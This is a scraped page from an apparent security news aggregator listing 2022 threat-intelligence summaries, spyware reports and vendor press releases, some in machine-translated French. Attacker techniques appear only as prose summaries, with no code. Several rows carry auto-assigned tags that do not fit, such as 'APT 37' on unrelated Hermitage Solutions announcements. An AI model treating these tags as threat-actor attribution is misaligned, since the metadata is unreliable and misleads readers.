SEC News

What's new arround internet

Last one

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2022-11-21 04:41:00	Hermitage Solutions signe un accord de distribution avec JumpCloud (lien direct)	Hermitage Solutions signe un accord de distribution avec JumpCloud , fournisseur d'une plateforme d'annuaire d'entreprise dans le cloud (Open Directory) qui unifie la gestion des périphériques et des identités pour tous les types de ressources informatiques - sur site, dans le cloud et pour Windows, Mac, Linux, iOS. - Business	Cloud	APT 37
	2022-11-18 23:30:00	24 nov. 2022 12:00 - 13:00 Webinaire ACCEDIAN et Hermitage Solutions : Pourquoi utiliser une solution NDR pour couvrir les angles morts des EDR & pare-feux (Firewall) de vos clients ? (lien direct)	Face aux moyens de protection avancés, les attaquants sont devenus de plus en plus innovants avec des techniques d'attaques évoluées telles que le DNS tunnelling, le balisage (beaconing), des typologies d'attaque difficilement identifiables par les pare-feux et EDR de vos clients. Comment donc combler cette faille pour assurer une protection complète de vos clients ? Ce jeudi 24 novembre à 12h, nos experts Yvan Lanzada, responsable commercial pour Hermitage Solutions, et Romain Ollier, (...) - Événements	Cloud	APT 37
	2022-11-17 17:40:11	Hermitage Solutions intègre la solution de détection et de réponse réseau (NDR) d\'Accedian à son catalogue (lien direct)	Hermitage Solutions intègre la solution de détection et de réponse réseau (NDR) d'Accedian à son catalogue - Business	Cloud	APT 37
	2022-11-16 19:00:00	Plus intelligent, pas plus difficile: comment hiérarchiser intelligemment le risque de surface d'attaque Smarter, Not Harder: How to Intelligently Prioritize Attack Surface Risk (lien direct)	Il y a un dicton commun dans la cybersécurité: «Vous ne pouvez pas protéger ce que vous ne savez pas», et cela s'applique parfaitement à la surface d'attaque d'une organisation donnée. De nombreuses organisations ont des risques cachés tout au long de leur infrastructure informatique et de sécurité étendue.Que le risque soit introduit par la croissance du nuage organique, l'adoption de dispositifs IoT ou par des fusions et acquisitions, le risque caché est dormant.En conséquence, les équipes informatiques et de sécurité n'ont pas toujours une image à jour de l'écosystème étendu qu'ils doivent défendre.Les outils hérités ont souvent des listes statiques de l'inventaire des actifs \\ 'connu There\'s a common saying in cyber security, “you can\'t protect what you don\'t know,” and this applies perfectly to the attack surface of any given organization. Many organizations have hidden risks throughout their extended IT and security infrastructure. Whether the risk is introduced by organic cloud growth, adoption of IoT devices, or through mergers and acquisitions, the hidden risk lies dormant. As a result, IT and security teams do not always have an up-to-date picture of the extended ecosystem they need to defend. Legacy tools often have static lists of the \'known\' asset inventory	Tool Cloud		★★★★
	2022-10-18 08:41:18	The benefits of taking an intent-based approach to detecting Business Email Compromise (lien direct)	By Abhishek Singh.BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets. A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge. Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit. Detection of exploitation techniques such as lookalike domains and any differences in the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent. The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages, irrespective of whether a threat actor is impersonating a C-level executive or any employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in better designing preventive features to stop BEC. Business email compromise (BEC) is one of the most financially damaging online crimes. As per the internet crime 221 report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollars loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully. There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC from the simplistic through machine learning (ML) approaches. Policy-based detection The first place to start is with policy-based detection as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email.	Threat Medical Cloud	Yahoo Uber APT 38 APT 37 APT 29 APT 19 APT 15 APT 10
	2022-10-11 08:00:00	Protection des risques numériques mandialiants pour les clients Splunk Enterprise Mandiant Digital Risk Protection for Splunk Enterprise Customers (lien direct)	Une surface d'attaque d'une organisation \\ est en constante évolution à mesure que les empreintes numériques et l'adoption du cloud se développent, de nouvelles relations commerciales sont conçues et que les employés travaillent de n'importe où.En conséquence, chaque appareil, application, service réseau, fournisseur ou employé peut désormais être une cible pour le compromis initial dans le grand schéma d'une campagne d'acteur de menace. Pour atténuer les risques, les équipes de sécurité ont besoin d'une visibilité sur la surface d'attaque mondiale et le Web profond et sombre.La visibilité requise comprend l'établissement et la surveillance d'un inventaire complet d'actifs (connu et inconnu), comment leur marque est discutée sur An organization\'s attack surface is ever-changing as digital footprints and cloud adoption grow, new business relationships are conceived, and employees work from anywhere. As a result, every device, application, network service, supplier, or employee can now be a target for initial compromise in the grand scheme of a threat actor campaign. To mitigate risk, security teams need visibility into the global attack surface and deep and dark web. The required visibility includes establishing and monitoring a complete inventory of assets (known and unknown), how their brand is being discussed on	Threat Cloud		★★★
	2022-10-05 00:00:00	WatchGuard AuthPoint plus performant en termes de fonctionnalités MFA, de facilité d\\'utilisation et de rentabilité, selon le laboratoire Miercom (lien direct)	Paris, le 19 octobre 2022 - WatchGuard® Technologies, acteur mondial de la cybersécurité unifiée, annonce que sa solution d'authentification multifacteur (MFA) AuthPoint® a obtenu la certification " Performance Verified " du laboratoire de test et certification indépendant, Miercom. En évaluant AuthPoint par rapport à des solutions concurrentes dans une grande diversité de catégories, Miercom a constaté que la solution MFA de WatchGuard offrait une plus grande richesse fonctionnelle à un coût moindre, une configuration et une administration plus aisées, et une meilleure expérience pour l'utilisateur final. " Face à des acteurs de la menace accédant facilement à des milliards d'informations d'identification volées et divulguées en ligne, sans parler de la sophistication croissante des attaques de phishing, l'authentification par mot de passe seule n'est plus une protection adéquate dans l'environnement de sécurité actuel ", déclare Tracy Hillstrom, Vice President of Content Strategy & Experience chez WatchGuard Technologies. " Désormais, avec le passage au travail distant ou hybride notamment, les entreprises sont devenues dépendantes de la MFA pour vérifier l'identité des télétravailleurs où qu'ils se trouvent ". Le laboratoire Miercom a évalué les solutions MFA proposées par WatchGuard, Cisco Duo et Microsoft Azure en fonction de 24 critères différents. L'analyse a montré qu'AuthPoint procurait un ensemble complet de fonctionnalités à un prix abordable (y compris de nombreuses fonctions pour lesquelles ses concurrents facturent des frais supplémentaires), tout en surpassant les deux alternatives en termes de facilité d'utilisation et de fonctionnalités, pour les administrateurs comme pour les utilisateurs finaux. Tout cela représentant un retour sur investissement global incomparable. Miercom a ainsi noté qu'AuthPoint : Procure la plus grande simplicité de configuration et d'utilisation de l'authentification unique (SSO) pour les administrateurs et les utilisateurs. Offre une expérience utilisateur transparente et intuitive, ce qui la rend idéale pour les utilisateurs novices Intègre des fonctionnalités modernes comme l'authentification basée sur les risques, qui offre des capacités d'accès sécurisé encore améliorées par l'utilisation de politiques de risque personnalisables. Est la seule solution parmi celles testées offrant une migration fondée sur l'empreinte dans le Cloud sur toutes les plateformes lors de l'activation (l'approche qui offre le plus haut niveau de sécurité face aux pirates). Offre une valeur ajoutée et un retour sur investissement élevés grâce à la combinaison d'un riche éventail de fonctionnalités, d'un prix d'achat unique abordable et d'une extrême facilité d'utilisation. Dans l'ensemble, Miercom a estimé que WatchGuard AuthPoint " s'est montré compétitivement supérieur dans le provisioning de l'authentification, le déploiement et les tests de sécurité ", notant que " Cisco and Microsoft sont loin d'offrir autant de fonctionnalités, de facilité d'utilisation ou d'interfaces intuitives que WatchGuard ". Cliquer ici pour lire le rapport complet de Miercom (en anglais) et ici pour accéder au rapport de synthèse en français. Cliquer ici pour plus d'informations sur AuthPoint.	Cloud		★★
	2022-09-21 18:36:17	Sophisticated Hermit Mobile Spyware Heralds Wave of Government Surveillance (lien direct)	At the SecTor 2022 conference in Toronto next month, researchers from Lookout will take a deep dive into Hermit and the shadowy world of mobile surveillance tools used by repressive regimes.	Cloud	APT 37
	2022-09-19 13:47:00	Meeting the “Ministrer” (lien direct)	FortiGuard Labs discovered an unassuming phishing email that attempts to deploy malware. The actions used to execute this strategy are consistent with Konni, a RAT that has been tied to the group APT 37. Read to learn more about this social engineering lure.	Cloud	APT 37
	2022-09-12 08:00:00	Déplacer la mission vers l'avant: Mandiant rejoint Google Cloud Moving the Mission Forward: Mandiant Joins Google Cloud (lien direct)	google \\ 's acquisition of Mandiant est désormais complet , marquant un grand moment pour notre équipe et pour la communauté de sécurité que nous servons. Dans le cadre de Google Cloud, Mandiant a désormais une capacité beaucoup plus grande pour combler l'écart de sécurité créé parun nombre croissant d'adversaires.Au cours de mes 29 ans en première ligne de la sécurisation des réseaux, j'ai vu des criminels, des États-nations et de mauvais acteurs à faire nuire aux bonnes personnes.En combinant notre expertise et notre intelligence avec l'échelle et les ressources de Google Cloud, nous pouvons faire une grande différence dans la prévention et la lutte contre les cyberattaques, tout en pincement Google\'s acquisition of Mandiant is now complete, marking a great moment for our team and for the security community we serve. As part of Google Cloud, Mandiant now has a far greater capability to close the security gap created by a growing number of adversaries. In my 29 years on the front lines of securing networks, I have seen criminals, nation states, and plain bad actors bring harm to good people. By combining our expertise and intelligence with the scale and resources of Google Cloud, we can make a far greater difference in preventing and countering cyber attacks, while pinpointing	Cloud		★★★
	2022-08-30 15:01:00	Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] OS Credential Dumping - T1003 \| [MITRE ATT&CK] Phishing - T1566 \|	Ransomware Hack Tool Vulnerability Threat Guideline Cloud	APT 37 APT 29 LastPass
	2022-08-29 00:00:00	Le nouveau certificat de cybersécurité offre aux PME une voie vers une plus grande résilience commerciale et un sauvetage en ligne New cyber security certificate offers SMEs a pathway to greater business resilience and online savviness (lien direct)	Chair of Cybersecurity in Munster Technological University, Dr. Donna O\'Shea, and Head of School of Informatics & Cybersecurity at TU Dublin, Dr. Anthony Keane contributed to this article in the Independent.ie In recent years, cyber security has emerged as a key issue for businesses in Ireland and across the world. Small enterprises are exposed to the same digital threats as larger businesses, but may lack the resources to defend themselves. It has been estimated that almost half of SMEs that suffer a serious cyber attack can go out of business within months. Enhanced cyber security is a matter of great societal importance, because SMEs operating in myriad industries such as retail, health care and construction are the backbone of the Irish economy. They constitute 99pc of all businesses and account for more than half of EU Gross Domestic Product (GDP). SMEs play a vital role in adding value to all sector of the economy, but they may lack essential skills on how to protect their businesses, which are often heavily dependent on digital systems that are vulnerable to cyber-attacks. The urgency of addressing this skills gap was highlighted by the COVID-19 pandemic, which forced many businesses online, exposing them to a higher risk of cyber attacks with little support available. Irish businesses operating online often possess a low cyber security awareness, have inadequate knowledge of GDPR requirements in the protection of critical and sensitive information, and have a low level of Information and Communications Technology (ICT) skills to protect their business. They can also experience significant budgetary constraints that lead them to view cyber security as a relatively significant cost, rather than an important investment in their business resilience. In addition, many SMEs have direct and indirect business relationships with larger organisations. For this reason, cyber criminals often focus on SMEs as a gateway into the larger organisations, knowing that these smaller businesses\' cyber awareness and defensive structures are typically less robust than those of the criminals\' larger targets. Recently, the National Cyber Security Centre (NCSC) and the Garda National Crime Bureau have written to the Small Firms Association to warn business owners of the ongoing series of ransomware attacks. They have observed a growing trend of small and medium sized enterprises being targeted by cybercrime groups with ransomware malicious software that is designed to block access to a computer system. Another common cyber crime tactic is threatening to leak sensitive stolen data until a sum of money is paid. The NCSC said it has noticed a change in tactics whereby hackers are now turning their attention away from big business and Government departments, towards smaller businesses. Providing businesses with cyber skills Professor Donna O\'Shea is Chair of Cybersecurity in Munster Technological University and currently leads a Higher Education Authority (HEA) Human Capital Initiative (HCI) project called CYBER-SKILLS: a nationally funded project in collaboration with University of Limerick, Technological University (TU) Dublin, and Commonwealth Cyber Initiative, Virginia Tech U.S. This ground-breaking initiative aims to address the cybersecurity skills challenge in Irish SMEs. Prof. O\'Shea says, “Growing up, my family owned an electrical retail store, so I really understood the challenges that small businesses face, their limitations in terms of time and how cost can sometimes be a barrier. When designing the course Certificate in Cybersecurity for Business for CYBER-SKILLS, we really wanted a pathway to be open to everyone and we wanted to reduce the barriers to participating in the course, by reducing the cost, making it flexible in delivery, focusing on applied skills and providing the essential necessary knowledge and skills to protect small businesses everywhere against cyber attacks.” Irish professionals and businesses have expressed a growing interest in cybersecurity courses and careers, as borne out by the recen	Ransomware Data Breach Malware Patching Prediction Cloud		★★
	2022-08-25 01:00:31	Kimsuky\'s GoldDragon cluster and its C2 operations (lien direct)	Kimsuky (also known as Thallium, Black Banshee and Velvet Chollima) is a prolific and active threat actor primarily targeting Korea-related entities. In early 2022, we observed this group was attacking the media and a think-tank in South Korea.	Threat Cloud	APT 37
	2022-08-18 08:00:00	Ukraine and the fragility of agriculture security (lien direct)	By Joe Marshall.The war in Ukraine has had far-reaching global implications and one of the most immediate effects felt will be on the global supply chain for food. This war-induced fragility has exposed the weaknesses of how we feed ourselves globally. Ransomware cartels and other adversaries are well aware of this and are actively exploiting that fragility. For the past six years, Cisco Talos has been actively involved in assisting public and private institutions in Ukraine to defend themselves against state-sponsored actors. Our involvement stretches the gamut from commercial to critical infrastructure, to election security. Our presence has afforded us unique opportunities and observations about cybersecurity in a macro and micro way. Ukraine has been a frequent victim of state-sponsored cyber attacks aimed at critical infrastructures like power and transportation. Talos is proud to stand with our partners in Ukraine and help defend their critical networks and help users there maintain access to necessary services. Now that Russia has invaded Ukraine, those threats have escalated to kinetic attacks that are wreaking havoc on a critical element of our world: agriculture and our global food supply chain. Even worse is the implications this war will have for future cyber attacks, as fragility is considered a lucrative element in deciding victimology by threat actors like ransomware cartels. To truly grasp the implications of the war in Ukraine, we have to examine how vital Ukrainian agriculture feeds the world, the current state of affairs, and what this means for the global cybersecurity posture to protect agricultural assets. Where there is weakness, there is opportunityRansomware cartels and their affiliates are actively targeting the agricultural industry. Moreover, these actors have done their homework and are targeting agricultural companies during the two times of the year where they cannot suffer disruptions: planting and harvesting. Per the published FBI PIN Alert: “Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production.” This is far from unusual for these adversaries - they are shrewd and calculating, and understand their victims' weaknesses and industries. H	Ransomware Threat Guideline Cloud	NotPetya Uber APT 37 APT 32 APT 28 APT 10 APT 21 Guam
	2022-08-06 10:46:21	CISO workshop slides (lien direct)	A glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):	Malware Vulnerability Threat Patching Guideline Medical Cloud	Uber APT 38 APT 37 APT 28 APT 19 APT 15 APT 10 APT 34 Guam
	2022-08-02 15:17:00	Anomali Cyber Watch: Velvet Chollima Steals Emails from Browsers, Austrian Mercenary Leverages Zero-Days, China-Sponsored Group Uses CosmicStrand UEFI Firmware Rootkit, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyber mercenaries, Phishing, Rootkits, Spyware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SharpTongue Deploys Clever Mail-Stealing Browser Extension “SHARPEXT” (published: July 28, 2022) Volexity researchers discovered SharpExt, a new malicious browser app used by the North-Korea sponsored Velvet Chollima (Kimsuky, SharpTongue, Thallium) group. SharpExt inspects and exfiltrates data from a victim's webmail (AOL or Gmail) account as they browse it. Velvet Chollima continues to add new features to the app, the latest known version (3.0) supports three browsers: Microsoft Edge, Google Chrome, and Whale, the latter almost exclusively used in South Korea. Following the initial compromise, Velvet Chollima deploy SharpExt and to avoid warning the victim they manually exfiltrate settings files to change the settings and generate a valid "super_mac" security check value. They also hide the newly opened DevTools window and any other warning windows such as a warning regarding extensions running in developer mode. Analyst Comment: Velvet Chollima is known for its tactic of deploying malicious browser extensions, but in the past it was concentrating on stealing credentials instead of emails. The group continues aggressive cyberespionage campaigns exfiltrating military and industrial technologies from Europe, South Korea, and the US. Network defenders should monitor for suspicious instances of PowerShell execution, as well as for traffic to and from known Velvet Chollima infrastructure (available in Anomali Match). MITRE ATT&CK: [MITRE ATT&CK] Browser Extensions - T1176 \| [MITRE ATT&CK] Email Collection - T1114 \| [MITRE ATT&CK] Command and Scripting Interpreter - T1059 \| [MITRE ATT&CK] Hide Artifacts - T1564 Tags: SharpExt, Velvet Chollima, Kimsuky, SharpTongue, Thallium, APT, North Korea, source-country:KP, South Korea, target-country:KR, USA, target-country:US, target-region:Europe, AOL, Gmail, Edge, Chrome, Whale, PowerShell, VBS, Browser extension Untangling KNOTWEED: European Private-Sector Offensive Actor Using 0-Day Exploits (published: July 27, 2022) Microsoft researchers detail activity of DSIRF, Austrian private-sector offensive actor (PSOA). In 2021, this actor, tracked as Knotweed, used four Windows and Adobe 0-day exploits. In 2022, DSIRF was exploiting another Adobe Reader vulnerability, CVE-2022-22047, which was patched in July 2022. DSIRF attacks rely on their malware toolset called Subzero. The initial downloader shellcode is executed from either the exploit chains or malicious Excel documents. It downloads a JPG image file with extra encrypted data, extracts, decrypts and loads to the memory the Corelump memory-only infostealer. For persistence, Corelump creates trojanized copies of legitimate Windows DLLs that se	Malware Tool Vulnerability Threat Patching Guideline Cloud	APT 37 APT 28
	2022-07-28 00:00:00	2022 semble être sur la cible de l'année la plus basse des violations signalées par les grandes sociétés américaines dans les six premiers mois de 2022, les grandes sociétés américaines [de revenus> 2 milliards] ont déclaré le moins de violations de données au cours des cinq dernières années. 2022 seems to be on target for the lowest year of reported breaches by large US corporationsIn the first six months of 2022, large [Revenue >2bn] US corporations reported the fewest data breaches in the past five years.Read More (lien direct)	âThe number of data breaches reported in the first 6 months of 2022 has put this year on track to be the lowest year of reports in the last 5 years for large [Revenue >2bn] US corporations. By looking at the rate at which data breach events have been reported so far this year, we predict that the number of events reported is expected to be15-20% of the number of breaches reported in 2021âPossible causes:Increased reporting delays: But the time to report has shown a decreasing trend over the last 4 yearsGenuine improvement in cyber defenses preventing data exfiltrationÂ Reduction in reporting requirements, or public disclosure preventionIn this analysis we look at all the reported cyber events which involve data exfiltration (data breach), allocated to the year in which the event started. Comparing the number of events reported at each point during the year then gives us an indication for the rate which can be compared between years.The data and populationThe data collected represents public reports of data breaches from US companies with an annual revenue above $2bn (Excluding public services).The data used includes breach events reported up to end of Q2 2022It is this area where the cyber reporting requirements are highest, there is a high level of data available. It is important to note that this will not be all events which occur, only those disclosed, but by looking for changes in the behavior we can look at the potential causes.Overall Breach CountAs of the end of Q2 2022, we have seen 18 breach reports of events occurring in 2022 compared to the 160 cyber events reported from 2021, and 292 from 2020. While we are only 50% through 2022, the number of events reported so far from the first half is 25% of the 2021 total reported at the same point through 2021.Â To fully compare 2022 against prior years we need to take into account a number of factors:Events not yet reported: some events have occurred but have not yet been reported either because they have not yet been discovered, or because the have been discovered but not publicly disclosedEvents not yet occurred: events which have yet to occur, in the second half of 2022 (and have not yet been reported)âââHow the year unfoldsTo explore how 2022 is emerging, we can look at the rate at which events are being reported. That is to show not just the total report to date, but how the total number of events reported in a year has emerged from the start of the year. To do this we plot the cumulative number of events reported vs the number of days from the start of each incident year.What we see is an indication of how many incidents have been reported from each year have been reported after the same number of days. A steep curve indicates a greater number of incidents reported per month.** Note that the event counts are lower because we do not have exact disclosure dates for all events.ââFrom the chart we can see that the number of reported cyber incidents after 6 months (180 days) of experience is low for 2022 compared with all other years since 2015. This leads us to believe that 2022 is on track to have a very low number of overall incidents reported.There could be a few explanations for thisReporting Delay: The time taken to report incidents has increased in 2022, and there will be a correction in the later part of the yearCybersecurity Investment: The overall number of incidents reported will be lower due to improvements in security postureRegulatory Action: the overall number of incidents reported will be lower due to changes in how the events are reported (or required to be reported)âReporting DelayTo consider if the low reported number of events in 2022 is being driven by an increase in a delay between a cyber event starting and it being reported, we have looked at the trend over the last 10 yearsThe chart below shows the trend over the last 10 years.âââThere has been a steady reduction in median reporting delay from 204 days in 2017 to 63 days	Data Breach Prediction Cloud		★★★
	2022-07-24 13:53:53	Is APT28 behind the STIFF#BIZON attacks attributed to North Korea-linked APT37? (lien direct)	>North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries. Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in multiple countries, including Czech Republic, and Poland. The researchers attribute this campaign to the North Korea-linked APT37 group, aka […]	Threat Cloud	APT 37 APT 28
	2022-07-23 12:08:04	North Korean hackers attack EU targets with Konni RAT malware (lien direct)	Threat analysts have uncovered a new campaign attributed to APT37, a North Korean group of hackers, targeting high-value organizations in the Czech Republic, Poland, and other European countries. [...]	Malware Threat Cloud	APT 37
	2022-07-09 16:53:07	Apple Lockdown Mode will protect users against highly targeted cyberattacks (lien direct)	>Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. The new feature will be implemented in iOS 16, iPadOS […]	Cloud	APT 37
	2022-06-29 10:03:54	Hermit spyware is deployed with the help of a victim\'s ISP (lien direct)	A new commercial spyware for governments, called Hermit, has spotted in the wild. It affects iOS and all Android versions.	Cloud	APT 37
	2022-06-24 15:00:00	What is iOS Hermit spyware? (lien direct)	>iOS Hermit spyware is a commercial-grade surveillance tool derived from a known Android surveillance tool. Learn more + how to stay safe.	Tool Cloud	APT 37
	2022-06-24 12:37:15	Google details commercial spyware that targets both Android and iOS devices (lien direct)	Hermit highlights a wider issue concerning our privacy and freedom.	Cloud	APT 37
	2022-06-24 03:40:50	Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware (lien direct)	A week after it emerged that sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices. Additionally, necessary changes have been implemented in Google Play Protect - Android's built-in malware defense service - to protect all users, Benoit Sevens and Clement Lecigne of Google Threat	Malware Cloud	APT 37
	2022-06-21 08:58:07	Lookout Discovers Android Spyware Deployed in Kazakhstan (lien direct)	Lookout has announced the discovery of an enterprise-grade Android surveillanceware currently used by the government of Kazakhstan within its borders. Lookout researchers also found evidence of deployment of the spyware – which Lookout researchers have named “Hermit” – in Italy and in northeastern Syria. Hermit is likely developed by Italian spyware vendor RCS Lab S.p.A. […]	Cloud	APT 37
	2022-06-17 20:00:33	Experts link Hermit spyware to Italian surveillance firm RCS Lab and a front company (lien direct)	>Experts uncovered an enterprise-grade surveillance malware dubbed Hermit used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers uncovered enterprise-grade Android surveillance spyware, named Hermit, used by the government of Kazakhstan to track individuals within the country. The latest samples of this spyware were detected by the researchers in April 2022, four […]	Malware Threat Cloud	APT 37
	2022-06-17 06:12:54	Researchers Uncover \'Hermit\' Android Spyware Used in Kazakhstan, Syria, and Italy (lien direct)	An enterprise-grade surveillanceware dubbed Hermit has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed. Lookout attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front	Cloud	APT 37
	2022-06-16 12:45:37	Lookout découvre un logiciel espion Android déployé au Kazakhstan (lien direct)	Lookout annonce la découverte d'un logiciel de surveillance Android de niveau enterprise actuellement utilisé par le gouvernement du Kazakhstan à l'intérieur de ses frontières. Les chercheurs de Lookout ont également trouvé des preuves du déploiement du logiciel espion - que les chercheurs de Lookout ont nommé " Hermit " - en Italie et dans le nord-est de la Syrie. Hermit est probablement développé par le vendeur italien de logiciels espions RCS Lab S.p.A. et Tykelab Srl, une société de solutions de (...) - Malwares	Cloud	APT 37
	2022-05-04 09:00:00	Anciennes services, nouvelles astuces: abus de métadonnées du cloud par UNC2903 Old Services, New Tricks: Cloud Metadata Abuse by UNC2903 (lien direct)	Depuis juillet 2021, Mandiant a identifié l'exploitation des applications Web accessibles au public par UNC2903 pour récolter et abuser des informations d'identification à l'aide du service d'instance d'Amazon \\ (IMD).Mandiant Tracked Access Tumps by UNC2903 pour accéder à des seaux S3 et des ressources cloud supplémentaires à l'aide des informations d'identification volées.Cet article de blog couvre comment UNC2903 a effectué l'exploitation et les abus IMD, ainsi que les meilleures pratiques connexes sur les techniques de durcissement du cloud. Bien que les environnements de services Web Amazon Web ciblés UNC2903 (AWS), de nombreuses autres plates-formes cloud proposent des services de métadonnées similaires qui pourraient être à risque de Since July 2021, Mandiant identified exploitation of public-facing web applications by UNC2903 to harvest and abuse credentials using Amazon\'s Instance Metadata Service (IMDS). Mandiant tracked access attempts by UNC2903 to access S3 buckets and additional cloud resources using the stolen credentials. This blog post covers how UNC2903 performed exploitation and IMDS abuse, as well as related best practices on cloud hardening techniques. Although UNC2903 targeted Amazon Web Services (AWS) environments, many other cloud platforms offer similar metadata services that could be at risk of	Cloud		★★★
	2022-05-03 16:31:00	Anomali Cyber Watch: Time-to-Ransom Under Four Hours, Mustang Panda Spies on Russia, Ricochet Chollima Sends Goldbackdoor to Journalists, and More (lien direct)	The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Cyberespionage, LNK files, Malspam, North Korea, Phishing, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Lookback Under the TA410 Umbrella: Its Cyberespionage TTPs and Activity (published: April 28, 2022) ESET researchers found three different teams under China-sponsored umbrella cyberespionage group TA410, which is loosely linked to Stone Panda (APT10, Chinese Ministry of State Security). ESET named these teams FlowingFrog, JollyFrog, and LookingFrog. FlowingFrog uses the Royal Road RTF weaponizer described by Anomali in 2019. Infection has two stages: the Tendyron implant followed by a very complex FlowCloud backdoor. JollyFrog uses generic malware such as PlugX and QuasarRAT. LookingFrog’s infection stages feature the X4 backdoor followed by the LookBack backdoor. Besides using different backdoors and exiting from IP addresses located in three different districts, the three teams use similar tools and similar tactics, techniques, and procedures (TTPs). Analyst Comment: Organizations should keep their web-facing applications such as Microsoft Exchange or SharePoint secured and updated. Educate your employees on handling suspected spearphishing attempts. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 \| [MITRE ATT&CK] Phishing - T1566 \| [MITRE ATT&CK] Native API - T1106 \| [MITRE ATT&CK] Shared Modules - T1129 \| [MITRE ATT&CK] Exploitation for Client Execution - T1203 \| [MITRE ATT&CK] 